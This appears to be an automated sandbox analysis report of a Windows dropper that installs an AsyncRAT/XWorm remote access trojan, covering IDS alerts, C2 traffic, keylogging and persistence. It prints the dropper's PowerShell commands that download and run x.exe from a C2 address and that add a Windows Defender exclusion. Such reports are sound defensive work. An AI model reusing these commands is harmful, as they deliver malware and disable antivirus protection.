                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmpJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Temp\D64C.tmpJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.tmpJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:49704 -> 45.141.26.234:80
                              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.234:7000 -> 192.168.2.5:49792
                              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49792 -> 45.141.26.234:7000
                              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49792 -> 45.141.26.234:7000
                              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.234:7000 -> 192.168.2.5:49792
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: 45.141.26.234
                              Yara detected Generic Downloader
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                              Source: global trafficTCP traffic: 192.168.2.5:49792 -> 45.141.26.234:7000
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 16:45:59 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 30 Oct 2024 15:10:36 GMTETag: "a200-625b31a9c95b5"Accept-Ranges: bytesContent-Length: 41472Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6b 4c 22 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 98 00 00 00 08 00 00 00 00 00 00 be b7 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 b7 00 00 4b 00 00 00 00 c0 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 97 00 00 00 20 00 00 00 98 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c0 04 00 00 00 c0 00 00 00 06 00 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b7 00 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 5d 00 00 f4 59 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 0
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                              Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                              Source: unknownDNS query: name: ip-api.com
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49704 -> 45.141.26.234:80
                              Source: global trafficHTTP traffic detected: GET /x.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.141.26.234Connection: Keep-Alive
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                              Source: global trafficHTTP traffic detected: GET /x.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.141.26.234Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: global trafficDNS traffic detected: DNS query: ip-api.com
                              Source: da6ke5KbfB.exe, 00000000.00000003.2053982880.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3264488758.00000000021D0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3259304446.000000000059C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3259304446.000000000065F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3263645269.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3263950487.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2123385471.00000211427A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2123149732.00000211424E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2123149732.00000211424F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2142160590.000002115C3F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2123620512.0000021143F90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2234849597.0000025463940000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2169981231.000002544B420000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2168411951.00000254498C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2169508877.0000025449C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2168411951.00000254498B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2276010311.0000028806440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2276183389.00000288064A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2273939605.0000028804B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2271230289.0000028804887000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2418921764.000001DE2808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exe
                              Source: x.exe, 00000005.00000002.3259304446.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exe:
                              Source: powershell.exe, 00000009.00000002.2168411951.00000254498B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeC
                              Source: x.exe, 00000005.00000002.3259304446.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeDX
                              Source: powershell.exe, 0000000E.00000002.2418921764.000001DE28070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeG
                              Source: powershell.exe, 00000006.00000002.2123149732.00000211424E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeUQ
                              Source: powershell.exe, 0000000C.00000002.2271230289.0000028804880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFIE=
                              Source: powershell.exe, 0000000E.00000002.2580037837.000001DE42117000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2422899086.000001DE28360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSER
                              Source: x.exe, 00000005.00000002.3281056817.000000001B238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeUSERDOMAIN=user-PCUScu
                              Source: powershell.exe, 00000009.00000002.2168411951.00000254498C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exeV
                              Source: powershell.exe, 00000009.00000002.2234849597.0000025463940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.141.26.234/x.exez
                              Source: powershell.exe, 0000000E.00000002.2577462726.000001DE42070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                              Source: powershell.exe, 0000000E.00000002.2577462726.000001DE42070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso6
                              Source: x.exe, 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, Java Update (32bit).exe.5.dr, x.exe.3.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                              Source: powershell.exe, 00000006.00000002.2137130616.000002115400E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2224765791.000002545B66E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362266084.000002881665E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 00000006.00000002.2123727725.00000211441C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B82A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.000002880681A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: x.exe, 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2123727725.0000021143FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.00000288065F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000006.00000002.2123727725.00000211441C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B82A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.000002880681A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: powershell.exe, 0000000E.00000002.2582478565.000001DE42410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                              Source: powershell.exe, 00000009.00000002.2237003722.0000025463AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.I
                              Source: powershell.exe, 00000006.00000002.2143878534.000002115C767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coX2
                              Source: powershell.exe, 00000006.00000002.2123727725.0000021143FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2170899412.000002544B601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2278359605.00000288065F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2427728210.000001DE29D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: powershell.exe, 0000000E.00000002.2427728210.000001DE29F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000006.00000002.2137130616.000002115400E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2224765791.000002545B66E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362266084.000002881665E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2553078686.000001DE39D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 616, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                              Contains functionality to log keystrokes (.Net Source)
                              Source: x.exe.3.dr, XLogger.cs.Net Code: KeyboardLayout
                              Source: Java Update (32bit).exe.5.dr, XLogger.cs.Net Code: KeyboardLayout

                              Operating System Destruction

                              barindex
                              Protects its processes via BreakOnTermination flag
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: 01 00 00 00 Jump to behavior

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\ProgramData\Java Update (32bit).exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Powershell drops PE file
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_004110790_2_00411079
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00411C200_2_00411C20
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_004110330_2_00411033
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00410C800_2_00410C80
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00410CA00_2_00410CA0
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_0040B9C70_2_0040B9C7
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_0040FA680_2_0040FA68
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_0040CF180_2_0040CF18
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_0040EFF00_2_0040EFF0
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00410FB00_2_00410FB0
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E666625_2_00007FF848E66662
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E606105_2_00007FF848E60610
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E617715_2_00007FF848E61771
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E658B65_2_00007FF848E658B6
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E6ED785_2_00007FF848E6ED78
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E6ED685_2_00007FF848E6ED68
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E606305_2_00007FF848E60630
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E694505_2_00007FF848E69450
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F530E96_2_00007FF848F530E9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848F430E99_2_00007FF848F430E9
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Java Update (32bit).exe C583D0A367ECFFA74B82B78116BBB04B7C92BED0300ED1C3ADC4EF3250FBB9CC
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\x.exe C583D0A367ECFFA74B82B78116BBB04B7C92BED0300ED1C3ADC4EF3250FBB9CC
                              Source: da6ke5KbfB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: C:\ProgramData\Java Update (32bit).exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: x.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: x.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: x.exe.3.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                              Source: Java Update (32bit).exe.5.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: Java Update (32bit).exe.5.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: Java Update (32bit).exe.5.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                              Source: x.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: x.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: Java Update (32bit).exe.5.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: Java Update (32bit).exe.5.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/24@1/2
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00402664 LoadResource,SizeofResource,FreeResource,0_2_00402664
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnkJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: \Sessions\1\BaseNamedObjects\2XLzSYLZvUJjDK3V
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1856:120:WilError_03
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile created: C:\Users\user\AppData\Local\Temp\D64C.tmpJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe"
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: da6ke5KbfB.exeReversingLabs: Detection: 55%
                              Source: unknownProcess created: C:\Users\user\Desktop\da6ke5KbfB.exe "C:\Users\user\Desktop\da6ke5KbfB.exe"
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
